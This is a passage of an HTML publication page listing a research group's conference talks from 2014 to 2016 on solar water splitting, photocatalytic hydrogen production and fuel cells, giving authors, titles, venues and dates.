2<sup>nd</sup> Fusion Conference on Molecules and Materials for Artificial Photosynthesis
Conference, Cancun, Mexico, February 2016
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>One-dimensional
Metal Oxides for Solar Water Splitting</strong>”, The 6<sup>th</sup> China-Australia Joint
Symposium on Energy and Biomedical Materials, Suzhou, China, January 2016
</li>
</ol>
<h5 align="center" class="h5" style="margin-top:15px; margin-bottom:0px;">2015 (50)</h5>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="198">
<li>
<strong><u>B. Wang</u></strong>, <strong>S.H. Shen*</strong>, <strong>L.J. Guo*</strong>,
“<strong>Hydrogenation
of {023} and {001} Facets Enclosed SrTiO<sub>3</sub> Single Crystals for Photocatalytic Hydrogen
Evolution</strong>”, 5<sup>th</sup> Asia-Pacific Forum on Renewable Energy, HF: Hydrogen &
Fuel
Cell, Jeju, Korea, November 2015
</li>
<li>
<strong><u>X.X. Wang</u></strong>, <strong>M.C. Liu</strong>, <strong>Z.H. Zhou</strong>,
<strong>L.J.
Guo*</strong>, “<strong>Crystal-Facets Dependent Solar Hydrogen Generation from Kinetic
Growth
Controlled CdS Nanoparticles</strong>”, 5<sup>th</sup> Asia-Pacific Forum on Renewable Energy,
HF:
Hydrogen & Fuel Cell, Jeju, Korea, November 2015
</li>
<li>
<strong><u>J. Wang</u></strong>, <strong>J.Z. Su</strong>, <strong>L. Vayssieres*</strong>,
<strong>L.J.
Guo*</strong>, “<strong>Controlled Synthesis of Porous Hematite Nanoplate Arrays for Solar
Water
Splitting: Towards Efficient Electron-Hole Separation</strong>”, 5<sup>th</sup> Asia-Pacific
Forum
on Renewable Energy, HF: Hydrogen & Fuel Cell, Jeju, Korea, November 2015
</li>
<li>
<strong><u>X.K. Wan</u></strong>, <strong>F.J. Niu</strong>, <strong>J.Z. Su</strong>, <strong>L.J.
Guo*</strong>, “<strong>Reduced Graphene Oxide Modification and Tungsten Doping for Enhanced
Photoelectrochemical Water Oxidation of Bismuth Vanadate</strong>”, 5<sup>th</sup> Asia-Pacific
Forum on Renewable Energy, HF: Hydrogen & Fuel Cell, Jeju, Korea, November 2015
</li>
<li>
<strong><u>G.Y. Chen</u></strong>, <strong>L.J. Guo*</strong>, <strong>H.T. Liu*</strong>,
“<strong>The
Relationship Between the Double Layer Capacitance and Water Content in the Cathode Catalyst
Layer</strong>”, 5<sup>th</sup> Asia-Pacific Forum on Renewable Energy, HF: Hydrogen & Fuel
Cell, Jeju, Korea, November 2015
</li>
<li>
<strong><u>X.Q. Wang</u></strong>, <strong>H.H. Yang*</strong>,<strong> Y. Zhang</strong>, <strong>L.J. Guo*</strong>,
“<strong>Isolation enhanced hydrogen production of CBB deactivation Rhodobacter sphaeroides
mutant
by using transposon mutagenesis in the presence of NH<sub>4</sub><sup>+</sup></strong>”,
5<sup>th</sup> Asia-Pacific Forum on Renewable Energy, HF: Hydrogen & Fuel Cell, Jeju,
Korea,
November 2015
</li>
<li>
<strong><u>Y. Zhang</u></strong>, <strong>H.H. Yang</strong>, <strong>J.L. Feng</strong>,
<strong>L.J. Guo*</strong>,
“<strong>Overexpression of F0 operon and F1 operon of ATPase in Rhodobacter sphaeroides
enhanced its photo-fermentative hydrogen production</strong>”, 5<sup>th</sup> Asia-Pacific
Forum on Renewable Energy, HF: Hydrogen & Fuel Cell, Jeju, Korea, November 2015
</li>
<li>
<strong><u>Y. Zhang</u></strong>, J. Hu, <strong>H.H. Yang</strong>,
<strong>L.J. Guo*</strong>,
“<strong>Bio-hydrogen production by co-culture of Enterobacter cloacae YA012 and
Rhodobacter
sphaeroides HY01</strong>”, 5<sup>th</sup> Asia-Pacific Forum on Renewable Energy, HF:
Hydrogen & Fuel Cell, Jeju, Korea, November 2015
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>One
Dimensional Metal Oxides for Solar Water Splitting</strong>”, 3<sup>rd</sup> International
Workshop on Nanotechnology, Renewable Energy & Sustainability, Xi'an, P. R. China,
September,
2015
</li>
<li>
<strong>M.C. Liu</strong>, “<strong>Facet-engineered chalcogenide photocatalyst for enhanced
solar
hydrogen production: charge separation and surface activation</strong>”, 14<sup>th</sup>
International Conference on Clean Energy (ICCE 2015), Saskatoon, Canada, September 2015
</li>
<li>
<strong><u>X.J. Guan</u></strong>, <strong>L.J. Guo</strong>, “<strong>Facet engineered bismuth
vanadate for highly efficient photocatalytic water oxidation</strong>”, 14<sup>th</sup>
International Conference on Clean Energy (ICCE 2015), Saskatoon, Canada, September 2015
</li>
<li>
<strong><u>Y.P. Yang</u></strong>, <strong>H.T. Liu*</strong>,<strong> L.J. Guo*</strong>,
“<strong>Optimization of operating conditions in PEM fuel cells with dead-ended
anode</strong>”,
14<sup>th</sup> International Conference on Clean Energy (ICCE 2015), Saskatoon, Canada,
September
2015
</li>
<li>
<strong><u>X.Q. Wang</u></strong>,
<strong>H.H. Yang*</strong>, <strong>L.J.</strong> <strong>Guo*</strong>,
“<strong>Enhancement of hydrogen production performance by the double mutant from cbbR knockout
strain via transposon mutagenesis</strong>”, 14<sup>th</sup> International Conference on Clean
Energy (ICCE 2015), Saskatoon, Canada, September 2015
</li>
<li>
<strong><u>X. Zhang</u></strong>, <strong>L.J. Guo*</strong>, <strong>H.T.
Liu</strong><strong>*</strong>,
“<strong>Mass transport degradation caused by carbon corrosion in proton exchange membrane fuel
cells</strong>”, 14<sup>th</sup> International Conference on Clean Energy (ICCE 2015),
Saskatoon,
Canada, September 2015
</li>
<li style="padding-top:0px;">
<strong>L. Vayssieres </strong><span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Advanced metal oxide arrays by aqueous chemical
growth</strong>”, EUROMAT-<span
title="European Congress and Exhibition on Advanced Materials and Processes registration">European Congress and Exhibition on Advanced Materials and Processes</span>,
Symposium C3.2: Assembly-Mediated and Surface-Based Coatings, Warsaw, Poland, September 2015
</li>
<li>
<STRONG>L. Vayssieres </STRONG><span class="invited">(<STRONG>Invited</STRONG>)</span>,
“<STRONG>Interfacial, Dimensionality, and Confinement effects in Oxide
Semiconductors</STRONG>”,
International Exploratory Workshop on Photoelectrochemistry, Catalysis and X-ray
Spectroscopy, EMPA
- Swiss Federal Laboratories for Materials Science & Technology, Dubendorf, Switzerland,
August
2015
</li>
<li>
<STRONG>L. Vayssieres </STRONG><span class="invited">(<strong>Invited</strong>)</span>,
“<STRONG>Latest advances in low-cost solar water splitting
nanodevices</STRONG>”, SPIE Optics & Photonics Nanoscience
Engineering,
Symposium on Low-Dimensional Materials and Devices, San Diego, CA, August 2015
</li>
<li>
<strong>L. Vayssieres </strong><span
class="invited">(<strong>Keynote & Session Chairs</strong>)</span>,
“<strong>On the surface, confinement and dimensionality effects of large bandgap oxide
semiconductors</strong>”, SPIE Optics & Photonics, Symposium on Solar Hydrogen &
Nanotechnology X, San Diego, CA, August 2015
</li>
<li>
<strong>L.J. Guo </strong><span class="invited">(<strong>Keynote</strong>)</span>,
<strong><u>S.H.
Shen</u></strong>, “<strong>Low-cost and high-efficiency solar hydrogen conversion: On
materials
design and pilot-scale demonstration</strong>”, SPIE Optics & Photonics, Symposium on Solar
Hydrogen & Nanotechnology X, San Diego, CA, August 2015
</li>
<li>
<strong>L.J. Guo</strong> <span class="invited">(<STRONG>Plenary</STRONG>)</span>, <strong><u>D.W.
Jing</u></strong>, “<strong>Solar hydrogen: harvesting light and heat from sun</strong>”, SPIE
Optics & Photonics, Symposium on Solar Hydrogen & Nanotechnology X, San Diego, CA,
August
2015
</li>
<li>
<strong>D.W. Jing </strong><span class="invited">(</span><span
class="invited"><strong>Invited</strong></span><span class="invited">)</span>, “<strong>Experimental
and numerical study on an annular fluidized-bed photocatalytic reactor</strong>”, SPIE Optics
&
Photonics, Symposium on Solar Hydrogen & Nanotechnology X, San Diego, CA, August 2015
</li>
<li>
X.J. Feng <strong> </strong><span class="invited">(</span><span
class="invited"><strong>Invited</strong></span><span class="invited">)</span>, <strong><u>J.Z.
Su</u></strong>, “<strong>Synthesis and assembly of 1D inorganic semiconductor for solar energy
conversion</strong>”, SPIE Optics & Photonics, Symposium on Solar Hydrogen &
Nanotechnology
X, San Diego, CA, August 2015
</li>
<li>
<u>F.J. Himpsel</u> <span class="invited">(<strong>Keynote</strong>)</span>, W.L. Yang, D.
Prendergast, C.X. Kronawitter, Z. Mi, <strong>L. Vayssieres</strong>, “<strong>Synchrotron-based
spectroscopy for solar energy conversion</strong>”, SPIE Optics & Photonics, Symposium
on
Solar Hydrogen & Nanotechnology X, San Diego, CA, August 2015
</li>
<li>
<strong>J.Z. Su</strong>, “<strong>High aspect ratio WO<sub>3</sub> nanorod arrays based
WO<sub>3</sub>/BiVO<sub>4</sub> Heterojunction for photoelectrochemical water splitting</strong>”,
SPIE Optics & Photonics, Symposium on Solar Hydrogen & Nanotechnology X, San Diego, CA,
August 2015
</li>
<li>
<strong><u>Y.B. Chen</u></strong>, <strong>Z.X. Qin</strong>, <strong>L.J. Guo</strong>,
“<strong>Electrophoretic
deposition of composition-tunable (Cu<sub>2</sub>Sn)<sub>x</sub>Zn<sub>3(1-x)</sub>S<sub>3</sub>
nanocrystal
films as efficient photocathodes for photoelectrochemical water splitting</strong>”, SPIE Optics
& Photonics, Symposium on Solar Hydrogen & Nanotechnology X, San Diego, CA, August 2015
</li>
<li>
<U><strong>J.W. Shi</strong></u>, <strong>Y.Z. Zhang</strong>, <strong>L.J. Guo</strong>,
“<strong>NH<sub>3</sub>-treated
MoS<sub>2</sub> nanosheets for enhanced H<sub>2</sub> evolution under visible-light
irradiation</strong>”, SPIE Optics & Photonics, Symposium on Solar Hydrogen &
Nanotechnology
X, San Diego, CA, August 2015
</li>
<li>
<strong><u>L.J. Ma</u></strong>, <strong>L.J. Guo</strong>, “<strong>Photocatalytic hydrogen
production over CdS: Effects of reaction atmosphere studied by in situ Raman
spectroscopy</strong>”,
SPIE Optics & Photonics, Symposium on Solar Hydrogen & Nanotechnology X, San Diego, CA,
August 2015
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited</strong>)</span>, “<strong>Doping
and Surface Engineering to Metal Oxide Nanorods for Photoelectrochemical Water
Splitting</strong>”,
5<sup>th</sup> Young Scholars Symposium on Nano & New Energy Technology, Suzhou, China, August
2015
</li>
<li>
<strong><u>J.W. Shi</u> </strong><span class="invited">(</span><span
class="invited"><strong>Invited</strong></span><span class="invited">)</span>, <strong>Y.Z.
Zhang</strong>, <strong>L.J. Guo</strong>, “<strong>Molybdenum sulfide nanosheets: ammonia
post-treatment towards improved visible-light-driven hydrogen production</strong>”, Mexico-China
workshop on Nanomaterials, Nanoscience and Nanotechnology: Renewable energy and water
remediation,
XXIV International Materials Research Congress, Cancun, Mexico, August 2015
</li>
<li>
<strong>J.Z. Su</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>WO<sub>3</sub>/BiVO<sub>4</sub> Nanowire Heterojunction for Photoelectrochemical Water
Oxidation</strong>”, Mexico-China workshop on Nanomaterials, Nanoscience and Nanotechnology:
Renewable energy and water remediation, XXIV International Materials Research Congress, Cancun,
Mexico, August 2015
</li>
<li>
<strong>L. Vayssieres </strong><span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>, “<strong>Quantum-confined
oxide arrays from aqueous solutions</strong>”, 8<sup>th</sup> International Conference on
Materials for Advanced Technology (ICMAT), Symposium R on Novel solution processes for advanced
functional materials, Suntec, Singapore, June-July 2015
</li>
<li>
<strong>L. Vayssieres </strong><span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>, “<strong>Aqueous
chemical growth of visible light-active oxide semiconductors</strong>”, 98<sup>th</sup>
Canadian Chemistry Conference & Exhibition, Division of Materials Chemistry, Symposium on
Nanostructured Materials for Solar Energy Conversion and Storage, Ottawa, Canada, June 2015
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Low Cost Nanodevices for Solar Water Splitting</strong>”, CMOS Emerging
Technologies Research Conference, Vancouver, BC, Canada, May 2015
</li>
<li>
<strong>J.J. Wei </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Study
of concentrating solar photovoltaic-thermal hybrid system</strong>”, 8<sup>th</sup> International
Conference on Energy Materials Nanotechnology (EMN East), Beijing, China, April 2015
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>1-D
metal oxide nanomaterials for efficient solar water splitting</strong>”, 8<sup>th</sup>
International Conference on Energy Materials Nanotechnology (EMN East), Symposium on
Nanomaterials
& Nanotechnology, Beijing, China, April 2015
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Plenary</strong>)</span>,
“<strong>Confinement effects in large bandgap oxide semiconductors</strong>”,
8<sup>th</sup> International Conference on Energy Materials Nanotechnology (EMN East), Beijing,
China, April 2015
</li>
<li>
<strong>M.C. Liu </strong><span class="invited">(</span><strong><span
class="invited">Invited</span></strong><span
class="invited">)</span>, “<strong>Twin-induced ordered homojunction for efficient solar
hydrogen production</strong>”, 8<sup>th</sup> International Conference on Energy Materials
Nanotechnology (EMN East), Beijing, China, April 2015
</li>
<li>
<strong>L. Vayssieres </strong><span
class="invited">(<strong>Invited</strong> <strong>talk & Session chair</strong>)</span>,
“<strong>Advanced growth control of oxide nanostructures in water</strong>”, 2015
MRS
Spring Meeting, Symposium RR: Solution Syntheses of Inorganic Functional/Multifunctional
Materials,
San Francisco, CA, USA, April 2015
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Interfacial engineering of large bandgap oxide nanostructures for solar energy
conversion</strong>”, 2015 MRS Spring Meeting, Symposium FF: Defects in
Semiconductors-Relationship to Optoelectronic Properties, San Francisco, CA, USA, April 2015
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Advanced low cost energy materials from aqueous solutions</strong>”, 2015
MRS
Spring Meeting, Symposium X: Frontiers of Materials Research, San Francisco, CA, USA, April 2015
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Quantum size effects in Anatase
TiO</strong><strong><sub>2</sub> nanoparticles</strong>”, 2015 MRS Spring Meeting,
Symposium
UU: Titanium Oxides-From Fundamental Understanding to Applications, San Francisco, CA, USA,
April
2015
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Metal oxide (hetero)nanostructures: Surface chemistry, interfacial electronic
structure, dimensionality effect and efficiency optimization</strong>”, 2015 MRS Spring
Meeting, Symposium TT: Metal Oxides-From Advanced Fabrication and Interfaces to Energy and
Sensing
Applications, San Francisco, CA, USA, April 2015
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited</strong>)</span>, “<strong>Nanorod
structured hematite photoanodes: metal doping and surface engineering towards efficient solar
water
splitting</strong>”, 2015 MRS Spring Meeting & Exhibit, Symposium J: Latest Advances in
Solar
Water Splitting, San Francisco, CA, USA, April 2015<BR>
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>On the effects of surface and dimensionality of oxide photocatalysts for water
splitting</strong>”, 249<sup>th </sup>American Chemical Society National Meeting &
Exposition, Symposium on Nanostructured Materials for Solar Energy Conversion and Storage,
Denver,
CO, USA, March 2015
</li>
<li>
<u><strong>Y. Hu</strong></u>, <strong>S.H. Shen</strong> <span
class="invited">(</span><strong><span class="invited">Invited</span></strong><span
class="invited">)</span>, <strong>M.C. Liu</strong>, “<strong>1D nanostructures design
for
efficient solar water splitting</strong>”, 249<sup>th</sup> American Chemical Society
National
Meeting & Exposition, Symposium on Nanostructured Materials for Solar Energy Conversion and
Storage, Denver, CO, USA, March 2015<BR>
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Low cost quantum-confined oxide arrays for solar water splitting</strong>”,
American Ceramic Society Materials Challenges in Alternative & Renewable Energy
2015, Symposium on Hydrogen Energy: Water Splitting & Energy Application, Jeju, South Korea,
February 2015
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited</strong>)</span>, “<strong>Metal
doping and surface engineering for efficient solar water splitting over hematite nanorod
photoanodes</strong>”, Materials Challenges in Alternative & Renewable Energy (MCARE 2015),
Symposium 1: Hydrogen Energy-Water Splitting and Energy Application, Jeju, South Korea, February
2015
</li>
<li>
<strong><u>M.C. Liu</u></strong>,<strong> N.X. Li</strong>, <strong>Z.H. Zhou</strong>,<strong>
J.C.
Zhou</strong>,<strong> Y.M. Sun</strong>,<strong> L.J. Guo</strong>, “<strong>Using
photooxidative
etching as a new approach to the determination of charge separation in faceted chalcogenide
photocatalysts</strong>”, Materials Challenges in Alternative & Renewable Energy (MCARE
2015),
Jeju, South Korea, February 2015
</li>
<li>
<strong><u>M. Wang</u></strong>, M. Pyeon, Y. Gönüllü, A. Kaouk,<strong> S. H.
Shen</strong>,<strong> S. Mathur</strong>, <strong>and L. J. Guo</strong>, “<strong>Double
Layered
TiO<sub>2</sub>@Fe<sub>2</sub>O<sub>3</sub> Photoelectrodes with “Z-Scheme” Structure for
Efficient
Photoelectrochemical (PEC) Water Splitting</strong>”, Materials Challenges in Alternative &
Renewable Energy (MCARE 2015), Jeju, South Korea, February 2015
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited</strong>)</span>, “<strong>Surface
engineered doping of hematite nanorod arrays for efficient solar water splitting</strong>”,
39<sup>th</sup>
International Conference and Expo on Advanced Ceramics and Composites, Symposium 7:
9<sup>th</sup>
International Symposium on Nanostructured Materials: Innovative Synthesis and Processing of
Nanostructured, Nanocomposite and Hybrid Functional Materials for Energy, Health and
Sustainability,
Daytona Beach, Florida, USA, January 2015
</li>
</ol>
<h5 align="center" class="h5" style="margin-top:15px; margin-bottom:0px;">2014 (52)</h5>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="148">
<li>
<strong>L.J. Guo</strong>, Advanced Innovation and development Symposium of Energy and Chemical
Industry, Xi’an, Shaanxi, China, December 2014
</li>
<li>
<strong>L. Vayssieres </strong><span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>, “<strong>Low
Cost Metal Oxides for Solar Water Splitting: Quantum Confinement Effects, Interfacial Electronic
Structure and Aqueous Surface Chemistry</strong>”, 2014 MRS Fall Meeting, Symposium V:
Sustainable Solar-Energy Conversion Using Earth-Abundant Materials, Boston, MA, USA, November
2014
</li>
<li>
<strong>L.J. Guo</strong> <span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>,
“<strong>The fundamental research of large-scale hydrogen production utilizing solar
energy</strong>”,
15<sup>th</sup> National Conference on Hydrogen Energy-7<sup>th</sup> Hydrogen Energy Seminar
for
the Chinese mainland, Hong Kong, Macao and Taiwan, Symposium A on Hydrogen Production Technology
and
Its Application like Using Renewable energy, Chemical technology and others, Shanghai, China,
November 2014
</li>
<li>
<strong><u>Z.W. Ge</u></strong> <span class="invited">(<strong>Invited</strong>)</span>,
<strong>L.J.
Guo*</strong>, <strong>X.M. Zhang</strong>, <strong>S.K. Liu</strong>, <strong>H.
Jin</strong>,
“<strong>Hydrogen production by coal gasification in supercritical water with a novel fluidized
bed
gasifier</strong>”, 15<sup>th</sup> National Conference on Hydrogen Energy-7<sup>th</sup>
Hydrogen
Energy Seminar for the Chinese mainland, Hong Kong, Macao and Taiwan, Shanghai, China, November
2014
</li>
<li>
<strong><u>X.J. Guan</u></strong>, <strong>L.J. Guo*</strong>, “<strong>Fabrication of
TiO<sub>2</sub>/Ag<sub>3</sub>PO<sub>4</sub> composite for enhanced water oxidation</strong>”,
15<sup>th</sup> National Conference on Hydrogen Energy-7<sup>th</sup> Hydrogen Energy Seminar
for
the Chinese mainland, Hong Kong, Macao and Taiwan, Shanghai, China, November 2014
</li>
<li>
<strong><u>L.J. Ma</u></strong>, <strong>M.C. Liu</strong>, <strong>L.J. Guo</strong>, “<strong>Photocatalytic
hydrogen production over CdS: Effects of reaction atmosphere studied by in situ Raman
spectroscopy</strong>”, 15<sup>th</sup> National Conference on Hydrogen Energy-7<sup>th</sup>
Hydrogen Energy Seminar for the Chinese mainland, Hong Kong, Macao and Taiwan, Shanghai, China,
November 2014
</li>
<li>
<strong><u>J.B. Huang</u></strong>, <strong>L.J. Guo</strong>,
“<strong>BaZr<sub>0.1</sub>Ce<sub>0.7</sub>Y<sub>0.2</sub>O<sub>3-δ </sub>mixed with alkali
carbonates for low temperature SOFC applications: insight into stability</strong>”,
15<sup>th</sup>
National Conference on Hydrogen Energy-7<sup>th</sup> Hydrogen Energy Seminar for the Chinese
mainland, Hong Kong, Macao and Taiwan, Shanghai, China, November 2014
</li>
<li>
<strong><u>H. Jin</u></strong>, <strong>L.J. Guo</strong>, <strong>S.K. Liu</strong>, “<strong>Experimental
investigation on the key intermediates in the coal gasification process in supercritical
water</strong>”, 15<sup>th</sup> National Conference on Hydrogen Energy-7<sup>th</sup> Hydrogen
Energy Seminar for the Chinese mainland, Hong Kong, Macao and Taiwan, Shanghai, China, November
2014
</li>
<li>
<strong><u>G.Y. Chen</u></strong>, <strong>L.J. Guo</strong>, <strong>H.T. Liu</strong>,
“<strong>Effects
of microporous layers on water management of the proton exchange membrane fuel cell studied
using current
distribution method</strong>”, 15<sup>th</sup> National Conference on Hydrogen
Energy-7<sup>th</sup> Hydrogen Energy Seminar for the Chinese mainland, Hong Kong, Macao and
Taiwan,
Shanghai, China, November 2014<br>
</li>
<li>
<strong><u>B. Wang</u></strong>, <strong>M.C. Liu</strong>, <strong>L.J. Guo</strong>,
“<strong>All Surface Active Sites</strong><strong>: The Role of the Cocatalyst</strong>”,
15<sup>th</sup> National Conference on Hydrogen Energy-7<sup>th</sup> Hydrogen Energy Seminar
for
the Chinese mainland, Hong Kong, Macao and Taiwan, Shanghai, China, November 2014
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Dimensionality effects in oxide semiconductors</strong>”, 2<sup>nd</sup>
International Conference of Young Researchers on Advanced Materials (IUMRS-ICYRAM), Symposium on
Energy Conversion-Photocatalysis, Fuel Cells & Solar Cells, Hainan International Convention
& Exhibition Center, Haikou, Hainan Province, China, October 2014
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Interfacial Engineering for Efficient Solar Water Splitting</strong>”,
226<sup>th</sup> Electrochemical
Society (ECS) Fall Meeting, Symposium on Solar Fuels, Photocatalysts & Photoelectrochemical
Cells, Cancun, Mexico, October 2014
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Functionalized
modification to g-C<sub>3</sub>N<sub>4</sub> for efficient photocatalytic hydrogen generation:
Enhanced optical absorption and promoted charge separation</strong>”, IUPAC
10<sup>th</sup>
International Conference on Novel Materials and their Synthesis, Zhengzhou, China, October 2014
</li>
<li>
<strong><u>D.M. Zhao</u></strong>,<strong> J. Chen</strong>,<strong> S.H. Shen</strong>,
<strong>L.J.
Guo</strong>, “<strong>Enhanced Photocatalytic Activity for Hydrogen Evolution over
g-C<sub>3</sub>N<sub>4</sub> Modified by Ti Activated MCM-41 Mesoporous Silica</strong>”,
1<sup>st </sup>International Symposium on Catalytic Science and Technology in Sustainable Energy
and
Environment (EECAT-2014), Tianjin, China, October 2014
</li>
<li>
<strong>L. Vayssieres</strong> <span
class="invited">(<strong>Keynote lecture & Session chair</strong>)</span>,
“<strong>Interfacial
electronic structure & confinement effects for low-cost solar water splitting</strong>”,
SPIE Optics & Photonics, Symposium on Solar Hydrogen & Nanotechnology IX, San Diego, CA,
August 2014
</li>
<li>
<u><strong>J.Z. Su</strong></u> <span class="invited">(<strong>Invited</strong>)</span>,<strong>
Y.K. Wei</strong>, <strong>L.J. Guo</strong>, “<strong>A novel Co-Pi capped pyramidal
BiVO<sub>4</sub> nanorod arrays with enhanced solar water oxidation</strong>”, SPIE Optics
& Photonics, Symposium on Solar Hydrogen & Nanotechnology IX, San Diego, CA, August 2014
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>N-doped
ZnO nanorod arrays with gradient band structure for photoelectrochemical water
splitting</strong>”,
SPIE Solar Energy + Technology conference 2014, San Diego, CA, August 2014
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="invited_cited_blue">Keynote</strong>)</span>, “<strong>Oxide
Heteronanostructures
for Solar Water-Splitting</strong>”, 248<sup>th</sup> American Chemical Society National
Meeting & Exposition, 1<sup>st</sup> USA-China Symposium on Energy, San Francisco, CA,
August
2014
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Engineered
doping to metal oxide nanorod arrays for improved photoelectrochemical water splitting
activity</strong>”, 248<sup>th</sup> American Chemical Society National Meeting &
Exposition, San Francisco, CA, August 2014
</li>
<li>
<strong>L. Vayssieres </strong><span
class="invited">(<strong>Keynote lecture & Session chair</strong>)</span>,
“<strong>Recent Advances in Quantum-confined all-Oxide Heteronanostructures for Solar
Water-Splitting</strong>”, 6<sup>th</sup> International Symposium on Functional Materials,
Singapore, August 2014
</li>
<li>
<strong><u>Z.H. Zhou</u></strong>, <strong>S.H. Shen</strong>, <strong>L.J. Guo</strong>,
“<strong>Electronic structure of Ti and Sn doped hematite
(Fe<sub>2</sub>O<sub>3</sub>)</strong>”, 14<sup>th</sup> Solar Energy Photochemistry and
Photocatalysis Conference, Harbin, China, August 2014
</li>
<li>
Y. Lei, B.W. Zhang, <strong>B.F. Bai</strong>, T.S. Zhao, “<strong>A 1-D Model for
Species
Crossover Through the Membrane in All-Vanadium Redox Flow Batteries</strong>”, The
15<sup>th</sup> International Heat Transfer Conference, Kyoto, Japan, August 2014
</li>
<li>
B.W. Zhang, Y. Lei, <strong>B.F. Bai</strong>, T.S. Zhao, “<strong>Numerical Investigation
of
Thermal Management for Kilowatt Vanadium Redox Flow Batteries</strong>”, The
15<sup>th</sup>
International Heat Transfer Conference, Kyoto, Japan, August 2014
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="invited_cited_blue">Keynote</strong>)</span>, “<strong>Low cost water
splitting oxide heteronanostructures</strong>”, 22<sup>nd</sup> International Conference
on
Composites & Nano Engineering, Malta, July 2014
</li>
<li>
<strong>L.J. Guo</strong> <span
class="invited">(<strong>Keynote lecture & Session chair</strong>)</span>, “<strong>Solar
hydrogen: On material design and pilot-scale demonstration</strong>”, The 5<sup>th</sup>
Australia-China Conference on Science, Technology and Education and The 5<sup>th</sup>
Australia-China Symposium for Materials Science, Wollongong, Australia, July 2014
</li>
<li>
<strong><u>C. Zhang</u></strong>, C. Wang, S.J. Zhang, <strong>L.J. Guo</strong>, “<strong>The
effects of hydration activity of calcined dolomite on the silicothermic reduction
process</strong>”,
The Second Australia-China Joint Symposia on Minerals and Metallurgy, Sydney, Australia, July
2014
</li>
<li>
<strong>L.J. Guo</strong> <span class="invited">(<strong>Keynote</strong>)</span>, “<strong>The
progress in theoretical and experimental investigation of </strong>“<strong>boiling coal in
supercritical water to H<sub>2</sub> and Pure CO<sub>2</sub></strong>”<strong>
technology</strong>”,
2014 International Symposium on Frontiers of Technology for the Future: Low Carbon Energy and
Life
(FoTEL 2014), Hsinchu, Taiwan, June 2014
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong
class="invited_cited_blue">Invited</strong>)</span>,
“<strong>Interfacial chemistry and electronic structure of quantum-confined oxide
heteronanostructures for solar water splitting</strong>”, 3<sup>rd</sup> International
Conference on New Advances in Materials Research for Solar Fuels Production, Montreal, Canada, June
2014
</li>
<li>
<strong>S.H. Shen</strong>, “<strong>N ion implanted ZnO nanorod arrays: engineered band
structure for improved photoanodic performances</strong>”, International Conference on Clean
Energy
(ICCE2014), Istanbul, Turkey, June 2014
</li>
<li>
<strong><u>J.W. Shi</u></strong>, <strong>L.J. Guo</strong>, “<strong>Novel
ABO<sub>3</sub>-based
photocatalysts for water splitting under visible-light irradiation</strong>”, International
Conference on Clean Energy (ICCE2014), Istanbul, Turkey, June 2014
</li>
<li>
<strong><u>J.Z. Su</u></strong>, <strong>C. Liu</strong>,<strong> L.J. Guo</strong>,
“<strong>Different
metal element doped hematites and their electronic characterizations for solar water splitting
application</strong>”, International Conference on Clean Energy (ICCE2014), Istanbul,
Turkey,
June 2014
</li>
<li>
<strong><u>G.Y. Chen</u></strong>, <strong>H.T. Liu</strong>, <strong>L.J. Guo</strong>,
“<strong>Effects of micro-porous layer under wide operating conditions in proton exchange
membrane fuel cell</strong>”, International Conference on Clean Energy (ICCE2014),
Istanbul,
Turkey, June 2014
</li>
<li>
<strong><u>X.Q. Wang</u></strong>, <strong>H.H. Yang</strong>, <strong>Z. Yang</strong>,
<strong>L.J.
Guo*</strong>, “<strong>Remarkable enhancement on hydrogen production performance of
Rhodobacter sphaeroides by disruption of spbA and hupSL genes</strong>”, International
Conference on Clean Energy (ICCE2014), Istanbul, Turkey, June 2014
</li>
<li>
<strong><u>F. Jia</u></strong>, <strong>F.F. Liu</strong>,<strong> L.J.
Guo</strong>,<strong> </strong>H.T. Liu, “<strong>Reverse current during start-up in PEM
fuel-cells</strong>”,<strong> </strong>International Conference on Clean Energy
(ICCE2014),
Istanbul, Turkey, June 2014
</li>
<li>
<strong><u>Z.W. Ge</u></strong>,<strong> H. Jin</strong>, <strong>L.J. Guo</strong>,
“<strong>Hydrogen
production by catalytic gasification of coal in supercritical water with alkaline catalysts:
Explore
